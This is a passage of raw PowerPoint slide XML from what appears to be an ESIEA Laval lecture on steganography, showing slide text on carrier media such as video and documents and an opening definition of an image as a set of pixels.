            <a:ext cx="8418352" cy="799825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E536D"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="49076" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="213925">
              <a:spcBef>
                <a:spcPts val="386"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="8203376" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2378" u="sng" spc="-79" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Video	</a:t>
            </a:r>
            <a:endParaRPr sz="2378">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="213925">
              <a:spcBef>
                <a:spcPts val="503"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" spc="-178" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Compressed  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(M-JPEG, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>MPEG, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>DivX </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>. .</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.)</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360834" y="5232116"/>
            <a:ext cx="8418352" cy="799825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E536D"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="49076" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="213925">
              <a:spcBef>
                <a:spcPts val="386"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="8203376" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2378" u="sng" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Others	</a:t>
            </a:r>
            <a:endParaRPr sz="2378">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="213925">
              <a:spcBef>
                <a:spcPts val="503"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" spc="-89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Documents </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(text, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>PDF), </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-139" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Web  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-188" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>pages  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-119" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>(source  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-79" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>code), </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Programs  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>. .</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-386" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1957694084"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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4747" y="88033"/>
            <a:ext cx="1215565" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-149" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Steganography</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7219540" y="88033"/>
            <a:ext cx="1366567" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>C. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Hiding in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-119" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>images</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1359637" y="1012013"/>
            <a:ext cx="6420572" cy="4874716"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6165070" y="12638854"/>
            <a:ext cx="5798470" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr spc="-50" dirty="0"/>
              <a:t>ESIEA </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Laval </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-129" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-69" dirty="0"/>
              <a:t>Nicolas</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="99" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-59" dirty="0"/>
              <a:t>Bodin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8033591" y="6621582"/>
            <a:ext cx="557448" cy="179536"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168">
              <a:lnSpc>
                <a:spcPts val="1367"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1189" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>16 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="89" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1E536D"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>49</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3539289285"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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4747" y="88033"/>
            <a:ext cx="1215565" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>2.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-149" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId2" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Steganography</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7219540" y="88033"/>
            <a:ext cx="1366567" cy="182999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="25168"/>
            <a:r>
              <a:rPr sz="1189" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>C. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-69" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>Hiding in</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1189" spc="-119" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:hlinkClick r:id="rId3" action="ppaction://hlinksldjump"/>
              </a:rPr>
              <a:t>images</a:t>
            </a:r>
            <a:endParaRPr sz="1189">
              <a:latin typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="360834" y="740641"/>
            <a:ext cx="8418352" cy="1132865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="96B448"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="49076" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="213925">
              <a:spcBef>
                <a:spcPts val="386"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="8203376" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2378" u="sng" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>Definition	</a:t>
            </a:r>
            <a:endParaRPr sz="2378">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="213925">
              <a:spcBef>
                <a:spcPts val="503"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>image </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-119" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-168" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-109" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-119" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>pixels </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" i="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>I </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-525" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>=    </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" i="1" spc="30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2378" spc="44" baseline="-10416" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" i="1" spc="30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" i="1" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2378" spc="-87" baseline="-10416" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" i="1" spc="-59" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" i="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>. . . ,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" i="1" spc="30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" i="1" spc="50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2378" i="1" spc="73" baseline="-10416" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans"/>
                <a:cs typeface="Lucida Sans"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>}.</a:t>
            </a:r>
            <a:endParaRPr sz="2081">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="213925">
              <a:spcBef>
                <a:spcPts val="69"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2081" spc="-139" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Each </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-119" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>pixels </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-149" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>may </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-129" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>comprise </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2081" spc="-159" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
